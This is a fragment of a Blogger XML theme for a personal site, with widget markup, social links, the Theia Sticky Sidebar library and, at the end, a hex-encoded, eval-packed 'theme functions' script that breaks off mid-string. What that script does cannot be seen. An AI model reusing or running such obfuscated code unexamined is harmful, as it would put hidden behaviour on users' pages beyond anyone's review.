        <b:include cond='data:byline and data:this.postDisplay.showDate' data='post' name='postTimestamp'/>
      </b:with>
    </div>
  </b:with>
</b:includable>
            <b:includable id='snippetedPostContent'>
  <div class='post-content'>
    <b:include cond='data:this.postDisplay.showTitle' name='snippetedPostTitle'/>
    <b:include cond='data:this.postDisplay.showDate or data:this.postDisplay.showAuthor' name='snippetedPostByline'/>
    <b:include cond='data:this.postDisplay.showSnippet' data='post' name='postSnippet'/>
    <b:include cond='data:this.postDisplay.showFeaturedImage and data:post.featuredImage' name='snippetedPostThumbnail'/>
  </div>
</b:includable>
            <b:includable id='snippetedPostThumbnail'>
  <div class='item-thumbnail'>
    <a expr:href='data:post.url'>
      <b:include data='{                         image: data:post.featuredImage,                         imageSizes: [72, 144],                         imageRatio: &quot;1:1&quot;,                         sourceSizes: &quot;72px&quot;                        }' name='responsiveImage'/>
    </a>
  </div>
</b:includable>
            <b:includable id='snippetedPostTitle'>
  <b:if cond='data:post.title != &quot;&quot;'>
    <h3 class='post-title'><a expr:href='data:post.url'><data:post.title/></a></h3>
  </b:if>
</b:includable>
            <b:includable id='snippetedPosts'>
  <div role='feed'>
    <!-- Don't render the post that we're currently already looking at. -->
    <b:loop values='data:posts filter (p =&gt; p.id != data:view.postId)' var='post'>
      <article class='post' role='article'>
        <b:include name='snippetedPostContent'/>
      </article>
    </b:loop>
  </div>
</b:includable>
          </b:widget>
        </b:section>
        <b:section class='sidebar' id='social-widget' maxwidgets='1' name='Social Widget' showaddelement='yes'>
          <b:widget id='LinkList75' locked='true' title='Social Plugin' type='LinkList' version='2' visible='true'>
            <b:widget-settings>
              <b:widget-setting name='link-3'>https://www.instagram.com/rodrigoamorinn</b:widget-setting>
              <b:widget-setting name='sorting'>NONE</b:widget-setting>
              <b:widget-setting name='link-4'>https://www.youtube.com/rodrigoamorinn</b:widget-setting>
              <b:widget-setting name='text-1'>twitter</b:widget-setting>
              <b:widget-setting name='link-1'>https://twitter.com/rodrigoamorinn</b:widget-setting>
              <b:widget-setting name='text-0'>facebook</b:widget-setting>
              <b:widget-setting name='link-2'><![CDATA[https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://www.linkedin.com/in/rodrigoamorinn&ved=2ahUKEwi7udunh9GPAxUN1xoGHcIaCVMQFnoECAoQAQ&usg=AOvVaw1FL8ZdAgbkhTyKjfo8TFOB]]></b:widget-setting>
              <b:widget-setting name='text-3'>instagram</b:widget-setting>
              <b:widget-setting name='link-0'>https://www.facebook.com/rodrigoamorinn</b:widget-setting>
              <b:widget-setting name='text-2'>linkedin</b:widget-setting>
              <b:widget-setting name='text-4'>youtube</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main'>
  <b:include name='widget-title'/>
  <b:include name='content'/>
</b:includable>
            <b:includable id='content'>
              <div class='widget-content'>
                <ul class='social-counter social'>
                  <b:loop values='data:links' var='link'>
                    <li expr:class='data:link.name'><a expr:href='data:link.target' expr:title='data:link.name' target='_blank'/></li>
                  </b:loop>
                </ul>
              </div>
            </b:includable>
          </b:widget>
        </b:section>
        <b:section class='sidebar common-widget' id='sidebar2' name='Sidebar Right (B)' showaddelement='yes'>
          <b:widget id='BlogArchive1' locked='false' title='' type='BlogArchive' visible='false'>
            <b:widget-settings>
              <b:widget-setting name='showStyle'>HIERARCHY</b:widget-setting>
              <b:widget-setting name='yearPattern'>yyyy</b:widget-setting>
              <b:widget-setting name='showWeekEnd'>true</b:widget-setting>
              <b:widget-setting name='monthPattern'>MMMM</b:widget-setting>
              <b:widget-setting name='dayPattern'>MMM dd</b:widget-setting>
              <b:widget-setting name='weekPattern'>MM/dd</b:widget-setting>
              <b:widget-setting name='chronological'>false</b:widget-setting>
              <b:widget-setting name='showPosts'>true</b:widget-setting>
              <b:widget-setting name='frequency'>MONTHLY</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <b:include name='content'/>
    </b:includable>
            <b:includable id='content'>
      <div class='widget-content'>
        <div id='ArchiveList'>
          <div expr:id='data:widget.instanceId + &quot;_ArchiveList&quot;'>
            <b:include cond='data:this.style in {&quot;FLAT&quot;, &quot;MENU&quot;, &quot;HIERARCHY&quot;}' name='flat'/>
          </div>
        </div>
      </div>
    </b:includable>
            <b:includable id='flat'>
      <ul class='flat'>
        <b:loop values='data:data' var='i'>
          <li class='archivedate'>
            <a expr:href='data:i.url'>
              <data:i.name/><span class='post-count'><data:i.post-count/></span>
            </a>
          </li>
        </b:loop>
      </ul>
    </b:includable>
            <b:includable id='hierarchy'>
  <b:include data='data' name='interval'/>
</b:includable>
            <b:includable id='interval' var='intervals'>
  <ul class='hierarchy'>
    <b:loop values='data:intervals' var='interval'>
      <li class='archivedate'>
        <div class='hierarchy-title'>
          <a class='post-count-link' expr:href='data:interval.url'>
            <data:interval.name/>
            <span class='post-count'><data:interval.post-count/></span>
          </a>
        </div>
        <div class='hierarchy-content'>
          <b:include cond='data:interval.data' data='interval.data' name='interval'/>
          <b:include cond='data:interval.posts' data='interval.posts' name='posts'/>
        </div>
      </li>
    </b:loop>
  </ul>
</b:includable>
            <b:includable id='posts' var='posts'>
  <ul class='posts hierarchy'>
    <b:loop values='data:posts' var='post'>
      <li>
        <a expr:href='data:post.url'><data:post.title/></a>
      </li>
    </b:loop>
  </ul>
</b:includable>
          </b:widget>
          <b:widget id='Label2' locked='false' title='Labels' type='Label' version='2' visible='true'>
            <b:widget-settings>
              <b:widget-setting name='sorting'>ALPHA</b:widget-setting>
              <b:widget-setting name='display'>CLOUD</b:widget-setting>
              <b:widget-setting name='selectedLabelsList'/>
              <b:widget-setting name='showType'>ALL</b:widget-setting>
              <b:widget-setting name='showFreqNumbers'>true</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <b:include name='content'/>
    </b:includable>
            <b:includable id='cloud'>
  <b:loop values='data:labels' var='label'>
    <span class='label-size'>
      <b:class expr:name='&quot;label-size-&quot; + data:label.cssSize'/>
      <a class='label-name' expr:href='data:label.url'>
        <data:label.name/>
        <b:if cond='data:this.showFreqNumbers'>
          <span class='label-count'><data:label.count/></span>
        </b:if>
      </a>
    </span>
  </b:loop>
</b:includable>
            <b:includable id='content'>
      <div class='widget-content'>
        <b:class expr:name='data:this.display + &quot;-label&quot;'/>
        <b:include cond='data:this.display == &quot;list&quot;' name='list'/>
        <b:include cond='data:this.display == &quot;cloud&quot;' name='list'/>
      </div>
    </b:includable>
            <b:includable id='list'>
      <ul>
        <b:loop values='data:labels' var='label'>
          <li>
            <a class='label-name' expr:href='data:label.url'>
              <data:label.name/>
              <b:if cond='data:this.showFreqNumbers'>
                <span class='label-count'><data:label.count/></span>
              </b:if>
            </a>
          </li>
        </b:loop>
      </ul>
    </b:includable>
          </b:widget>
        </b:section>
  </div></div></b:if>
      </div>
  </div>
  </div>
 <div class='clearfix'/>

<!-- Footer Wrapper -->
<div id='footer-wrapper'> 
  <div class='container row'>
    <div class='footer-widgets-wrap'>
      <b:section class='footer common-widget' id='footer-sec1' maxwidgets='3' name='Section (Logo)' showaddelement='no'>
        <b:widget id='Image1' locked='true' title='' type='Image' visible='true'>
          <b:widget-settings>
            <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/a/AVvXsEikHPc0MLf4jIXZxYgeLpYRH7weKB4NZmjBYlcsrxNFD3YMDjjKM4PfTLv37JWmLb7iVLt1mS3ILXqzA3eAERkN0t9A8mzsPlG4D2Ty0gw9-5N90v_VTP3vxcnnTcEcr_L4FhR1AK6_3ODTj0FhniCpC3WdS5qaQqAFS_6Kf-BvpAmOmabvwtzo8szRgxPU=s390</b:widget-setting>
            <b:widget-setting name='displayHeight'>117</b:widget-setting>
            <b:widget-setting name='sectionWidth'>390</b:widget-setting>
            <b:widget-setting name='shrinkToFit'>true</b:widget-setting>
            <b:widget-setting name='displayWidth'>390</b:widget-setting>
            <b:widget-setting name='link'/>
            <b:widget-setting name='caption'/>
          </b:widget-settings>
          <b:includable id='main'>
  <b:include name='widget-title'/>
  <b:include name='content'/>
</b:includable>
          <b:includable id='content'>
  <div class='widget-content'>
    <b:tag cond='data:link' expr:href='data:link' name='a'>
      <img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId + &quot;_img&quot;' expr:src='data:sourceUrl' expr:width='data:width'>
        <b:attr cond='data:sourceSet' expr:value='data:sourceSet' name='srcset'/>
      </img>
    </b:tag>
    <br/>
    <b:if cond='data:caption'>
      <span class='caption'><data:caption/></span>
    </b:if>
  </div>
</b:includable>
        </b:widget>
      </b:section>
       <b:section class='footer top-bar-social social' id='top-bar-social' maxwidgets='1' name='Social Top' showaddelement='yes'>
         <b:widget id='LinkList73' locked='true' title='' type='LinkList' version='2' visible='true'>
           <b:widget-settings>
             <b:widget-setting name='link-3'>#</b:widget-setting>
             <b:widget-setting name='sorting'>NONE</b:widget-setting>
             <b:widget-setting name='text-1'>twitter</b:widget-setting>
             <b:widget-setting name='link-1'>https://twitter.com/rodrigoamorinn</b:widget-setting>
             <b:widget-setting name='text-0'>facebook</b:widget-setting>
             <b:widget-setting name='link-2'>https://www.instagram.com/rodrigoamorinn</b:widget-setting>
             <b:widget-setting name='text-3'>pinterest</b:widget-setting>
             <b:widget-setting name='link-0'>https://www.facebook.com/rodrigoamorinn/</b:widget-setting>
             <b:widget-setting name='text-2'>instagram</b:widget-setting>
           </b:widget-settings>
           <b:includable id='main'>
              <b:include name='content'/>
            </b:includable>
           <b:includable id='content'>
              <div class='widget-content'>
                <ul>
                  <b:loop values='data:links' var='link'>
                    <li expr:class='data:link.name'><a expr:href='data:link.target' expr:title='data:link.name' target='_blank'/></li>
                  </b:loop>
                </ul>
              </div>
            </b:includable>
         </b:widget>
       </b:section> 
      
    </div>
  </div>

<div class='clearfix'/>

<div id='sub-footer-wrapper'>
  <div class='container row'>
    <b:section class='top-bar-nav' id='top-bar-nav' maxwidgets='1' name='Top Navigation' showaddelement='yes'>
      <b:widget id='LinkList72' locked='true' title='Link List' type='LinkList' version='2' visible='true'>
        <b:widget-settings>
          <b:widget-setting name='sorting'>NONE</b:widget-setting>
          <b:widget-setting name='text-1'>Sobre mim</b:widget-setting>
          <b:widget-setting name='link-1'>https://www.rodrigoamorinn.com/p/perfil.html</b:widget-setting>
          <b:widget-setting name='text-0'>Home</b:widget-setting>
          <b:widget-setting name='link-2'>https://www.rodrigoamorinn.com/p/contato.html</b:widget-setting>
          <b:widget-setting name='link-0'>/</b:widget-setting>
          <b:widget-setting name='text-2'>Contact</b:widget-setting>
        </b:widget-settings>
        <b:includable id='main'>
              <b:include name='content'/>
            </b:includable>
        <b:includable id='content'>
              <div class='widget-content'>
                <ul>
                  <b:loop values='data:links' var='link'>
                    <li><a expr:href='data:link.target'><data:link.name/></a></li>
                  </b:loop>
                </ul> 
              </div>
            </b:includable>
      </b:widget>
    </b:section>
   <!-- Template history: original base Magsita by Om Templates. Visible footer credit removed in this Rodrigo Amorinn SEO/glass revision. -->
    
  </div>
</div>
</div>
   </div>
  </div>

<!-- Main Scripts -->
<script src='https://rodrigoamorinn-blogspot-template.pages.dev/assets/js/jquery-2.1.1.min.js'/>
<script type='text/javascript'>
//<![CDATA[   




/*! Theia Sticky Sidebar | v1.7.0 - https://github.com/WeCodePixels/theia-sticky-sidebar */
(function($){$.fn.theiaStickySidebar=function(options){var defaults={'containerSelector':'','additionalMarginTop':0,'additionalMarginBottom':0,'updateSidebarHeight':true,'minWidth':0,'disableOnResponsiveLayouts':true,'sidebarBehavior':'modern','defaultPosition':'relative','namespace':'TSS'};options=$.extend(defaults,options);options.additionalMarginTop=parseInt(options.additionalMarginTop)||0;options.additionalMarginBottom=parseInt(options.additionalMarginBottom)||0;tryInitOrHookIntoEvents(options,this);function tryInitOrHookIntoEvents(options,$that){var success=tryInit(options,$that);if(!success){console.log('TSS: Body width smaller than options.minWidth. Init is delayed.');$(document).on('scroll.'+options.namespace,function(options,$that){return function(evt){var success=tryInit(options,$that);if(success){$(this).unbind(evt)}}}(options,$that));$(window).on('resize.'+options.namespace,function(options,$that){return function(evt){var success=tryInit(options,$that);if(success){$(this).unbind(evt)}}}(options,$that))}}function tryInit(options,$that){if(options.initialized===true){return true}if($('body').width()<options.minWidth){return false}init(options,$that);return true}function init(options,$that){options.initialized=true;var existingStylesheet=$('#theia-sticky-sidebar-stylesheet-'+options.namespace);if(existingStylesheet.length===0){$('head').append($('<style id="theia-sticky-sidebar-stylesheet-'+options.namespace+'">.theiaStickySidebar:after {content: ""; display: table; clear: both;}</style>'))}$that.each(function(){var o={};o.sidebar=$(this);o.options=options||{};o.container=$(o.options.containerSelector);if(o.container.length==0){o.container=o.sidebar.parent()}o.sidebar.parents().css('-webkit-transform','none');o.sidebar.css({'position':o.options.defaultPosition,'overflow':'visible','-webkit-box-sizing':'border-box','-moz-box-sizing':'border-box','box-sizing':'border-box'});o.stickySidebar=o.sidebar.find('.theiaStickySidebar');if(o.stickySidebar.length==0){var javaScriptMIMETypes=/(?:text|application)\/(?:x-)?(?:javascript|ecmascript)/i;o.sidebar.find('script').filter(function(index,script){return script.type.length===0||script.type.match(javaScriptMIMETypes)}).remove();o.stickySidebar=$('<div>').addClass('theiaStickySidebar').append(o.sidebar.children());o.sidebar.append(o.stickySidebar)}o.marginBottom=parseInt(o.sidebar.css('margin-bottom'));o.paddingTop=parseInt(o.sidebar.css('padding-top'));o.paddingBottom=parseInt(o.sidebar.css('padding-bottom'));var collapsedTopHeight=o.stickySidebar.offset().top;var collapsedBottomHeight=o.stickySidebar.outerHeight();o.stickySidebar.css('padding-top',1);o.stickySidebar.css('padding-bottom',1);collapsedTopHeight-=o.stickySidebar.offset().top;collapsedBottomHeight=o.stickySidebar.outerHeight()-collapsedBottomHeight-collapsedTopHeight;if(collapsedTopHeight==0){o.stickySidebar.css('padding-top',0);o.stickySidebarPaddingTop=0}else{o.stickySidebarPaddingTop=1}if(collapsedBottomHeight==0){o.stickySidebar.css('padding-bottom',0);o.stickySidebarPaddingBottom=0}else{o.stickySidebarPaddingBottom=1}o.previousScrollTop=null;o.fixedScrollTop=0;resetSidebar();o.onScroll=function(o){if(!o.stickySidebar.is(":visible")){return}if($('body').width()<o.options.minWidth){resetSidebar();return}if(o.options.disableOnResponsiveLayouts){var sidebarWidth=o.sidebar.outerWidth(o.sidebar.css('float')=='none');if(sidebarWidth+50>o.container.width()){resetSidebar();return}}var scrollTop=$(document).scrollTop();var position='static';if(scrollTop>=o.sidebar.offset().top+(o.paddingTop-o.options.additionalMarginTop)){var offsetTop=o.paddingTop+options.additionalMarginTop;var offsetBottom=o.paddingBottom+o.marginBottom+options.additionalMarginBottom;var containerTop=o.sidebar.offset().top;var containerBottom=o.sidebar.offset().top+getClearedHeight(o.container);var windowOffsetTop=0+options.additionalMarginTop;var windowOffsetBottom;var sidebarSmallerThanWindow=(o.stickySidebar.outerHeight()+offsetTop+offsetBottom)<$(window).height();if(sidebarSmallerThanWindow){windowOffsetBottom=windowOffsetTop+o.stickySidebar.outerHeight()}else{windowOffsetBottom=$(window).height()-o.marginBottom-o.paddingBottom-options.additionalMarginBottom}var staticLimitTop=containerTop-scrollTop+o.paddingTop;var staticLimitBottom=containerBottom-scrollTop-o.paddingBottom-o.marginBottom;var top=o.stickySidebar.offset().top-scrollTop;var scrollTopDiff=o.previousScrollTop-scrollTop;if(o.stickySidebar.css('position')=='fixed'){if(o.options.sidebarBehavior=='modern'){top+=scrollTopDiff}}if(o.options.sidebarBehavior=='stick-to-top'){top=options.additionalMarginTop}if(o.options.sidebarBehavior=='stick-to-bottom'){top=windowOffsetBottom-o.stickySidebar.outerHeight()}if(scrollTopDiff>0){top=Math.min(top,windowOffsetTop)}else{top=Math.max(top,windowOffsetBottom-o.stickySidebar.outerHeight())}top=Math.max(top,staticLimitTop);top=Math.min(top,staticLimitBottom-o.stickySidebar.outerHeight());var sidebarSameHeightAsContainer=o.container.height()==o.stickySidebar.outerHeight();if(!sidebarSameHeightAsContainer&&top==windowOffsetTop){position='fixed'}else if(!sidebarSameHeightAsContainer&&top==windowOffsetBottom-o.stickySidebar.outerHeight()){position='fixed'}else if(scrollTop+top-o.sidebar.offset().top-o.paddingTop<=options.additionalMarginTop){position='static'}else{position='absolute'}}if(position=='fixed'){var scrollLeft=$(document).scrollLeft();o.stickySidebar.css({'position':'fixed','width':getWidthForObject(o.stickySidebar)+'px','transform':'translateY('+top+'px)','left':(o.sidebar.offset().left+parseInt(o.sidebar.css('padding-left'))-scrollLeft)+'px','top':'0px'})}else if(position=='absolute'){var css={};if(o.stickySidebar.css('position')!='absolute'){css.position='absolute';css.transform='translateY('+(scrollTop+top-o.sidebar.offset().top-o.stickySidebarPaddingTop-o.stickySidebarPaddingBottom)+'px)';css.top='0px'}css.width=getWidthForObject(o.stickySidebar)+'px';css.left='';o.stickySidebar.css(css)}else if(position=='static'){resetSidebar()}if(position!='static'){if(o.options.updateSidebarHeight==true){o.sidebar.css({'min-height':o.stickySidebar.outerHeight()+o.stickySidebar.offset().top-o.sidebar.offset().top+o.paddingBottom})}}o.previousScrollTop=scrollTop};o.onScroll(o);$(document).on('scroll.'+o.options.namespace,function(o){return function(){o.onScroll(o)}}(o));$(window).on('resize.'+o.options.namespace,function(o){return function(){o.stickySidebar.css({'position':'static'});o.onScroll(o)}}(o));if(typeof ResizeSensor!=='undefined'){new ResizeSensor(o.stickySidebar[0],function(o){return function(){o.onScroll(o)}}(o))}function resetSidebar(){o.fixedScrollTop=0;o.sidebar.css({'min-height':'1px'});o.stickySidebar.css({'position':'static','width':'','transform':'none'})}function getClearedHeight(e){var height=e.height();e.children().each(function(){height=Math.max(height,$(this).height())});return height}})}function getWidthForObject(object){var width;try{width=object[0].getBoundingClientRect().width}catch(err){}if(typeof width==="undefined"){width=object.width()}return width}return this}})(jQuery);




//]]>
</script>

  
<!-- Theme Functions JS -->
<script type='text/javascript'>
//<![CDATA[

var _WkHDzZ= "\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x75\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x6e\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x27\x5c\x5c\x62\x27\x2b\x65\x28\x63\x29\x2b\x27\x5c\x5c\x62\x27\x2c\x27\x67\x27\x29\x2c\x6b\x5b\x63\x5d\x29\x7d\x7d\x72\x65\x74\x75\x72\x6e\x20\x70\x7d\x28\x27\x31\x51\x20\x31\x42\x3d\x5b\x22\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x67\x5c\x5c\x31\x64\x5c\x5c\x68\x5c\x5c\x31\x37\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x67\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x31\x69\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x31\x79\x5c\x5c\x56\x5c\x5c\x7a\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x31\x34\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x74\x5c\x5c\x65\x5c\x5c\x31\x33\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x31\x61\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x76\x5c\x5c\x31\x32\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x31\x74\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x76\x5c\x5c\x31\x31\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x64\x5c\x5c\x67\x5c\x5c\x63\x5c\x5c\x6e\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x31\x66\x5c\x5c\x56\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x31\x30\x5c\x5c\x6b\x5c\x5c\x76\x5c\x5c\x31\x61\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x31\x66\x5c\x5c\x6b\x5c\x5c\x76\x5c\x5c\x59\x5c\x5c\x56\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x31\x6a\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x31\x69\x5c\x5c\x56\x5c\x5c\x6d\x5c\x5c\x31\x64\x5c\x5c\x76\x5c\x5c\x31\x33\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x31\x68\x5c\x5c\x56\x5c\x5c\x6d\x5c\x5c\x68\x5c\x5c\x59\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x31\x77\x5c\x5c\x6b\x5c\x5c\x68\x5c\x5c\x67\x5c\x5c\x56\x5c\x5c\x76\x5c\x5c\x31\x6b\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x6d\x5c\x5c\x76\x5c\x5c\x31\x67\x5c\x5c\x56\x5c\x5c\x6d\x5c\x5c\x64\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x76\x5c\x5c\x31\x62\x5c\x5c\x56\x5c\x5c\x76\x5c\x5c\x31\x6c\x5c\x5c\x31\x75\x5c\x5c\x64\x5c\x5c\x41\x5c\x5c\x42\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x76\x5c\x5c\x31\x72\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x76\x5c\x5c\x31\x63\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x75\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x67\x5c\x5c\x31\x64\x5c\x5c\x68\x5c\x5c\x31\x37\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x49\x5c\x5c\x61\x5c\x5c\x64\x5c\x5c\x31\x38\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x41\x5c\x5c\x65\x5c\x5c\x31\x69\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x31\x79\x5c\x5c\x56\x5c\x5c\x7a\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x31\x34\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x74\x5c\x5c\x65\x5c\x5c\x31\x33\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x42\x5c\x5c\x53\x5c\x5c\x62\x5c\x5c\x31\x75\x5c\x5c\x77\x5c\x5c\x62\x5c\x5c\x63\x5c\x5c\x67\x5c\x5c\x31\x64\x5c\x5c\x68\x5c\x5c\x31\x37\x5c\x5c\x56\x5c\x5c\x68\x5c\x5c\x59\x5c\x5c\x63\x5c\x5c\x61\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x49\x5c\x5c\x61\x5c\x5c\x64\x5c\x5c\x31\x38\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x41\x5c\x5c\x65\x5c\x5c\x31\x69\x5c\x5c\x69\x5c\x5c\x63\x5c\x5c\x68\x5c\x5c\x31\x79\x5c\x5c\x56\x5c\x5c\x7a\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x31\x34\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x74\x5c\x5c\x65\x5c\x5c\x31\x33\x5c\x5c\x7a\x5c\x5c\x63\x5c\x5c\x79\x5c\x5c\x6e\x5c\x5c\x76\x5c\x5c\x31\x39\x5c\x5c\x61\x5c\x5c\x42\x5c\x5c\x31\x75\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x70\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x44\x5c\x5c\x69\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x74\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x31\x67\x5c\x5c\x6d\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x76\x5c\x5c\x31\x73\x5c\x5c\x62\x5c\x5c\x78\x5c\x5c\x68\x5c\x5c\x31\x6a\x5c\x5c\x56\x5c\x5c\x31\x75\x5c\x5c\x4f\x5c\x5c\x79\x5c\x5c\x6e\x5c\x5c\x74\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x51\x5c\x5c\x65\x5c\x5c\x31\x61\x5c\x5c\x62\x5c\x5c\x68\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x6e\x5c\x5c\x44\x5c\x5c\x6e\x5c\x5c\x6a\x5c\x5c\x61\x5c\x5c\x78\x5c\x5c\x50\x5c\x5c\x6d\x5c\x5c\x73\x5c\x5c\x69\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x51\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x75\x5c\x5c\x69\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x64\x5c\x5c\x31\x38\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x67\x5c\x5c\x69\x5c\x5c\x73\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x62\x5c\x5c\x72\x5c\x5c\x31\x70\x5c\x5c\x72\x5c\x5c\x61\x5c\x5c\x6e\x5c\x5c\x4b\x5c\x5c\x69\x5c\x5c\x72\x5c\x5c\x31\x34\x5c\x5c\x72\x5c\x5c\x47\x5c\x5c\x64\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x69\x5c\x5c\x62\x5c\x5c\x73\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x4e\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x47\x5c\x5c\x73\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x4e\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x4f\x5c\x5c\x61\x5c\x5c\x47\x5c\x5c\x72\x5c\x5c\x6b\x5c\x5c\x4b\x5c\x5c\x72\x5c\x5c\x47\x5c\x5c\x64\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x31\x69\x5c\x5c\x62\x5c\x5c\x73\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x43\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x47\x5c\x5c\x73\x5c\x5c\x65\x5c\x5c\x68\x5c\x5c\x43\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x7a\x5c\x5c\x64\x5c\x5c\x4f\x5c\x5c\x61\x5c\x5c\x47\x5c\x5c\x72\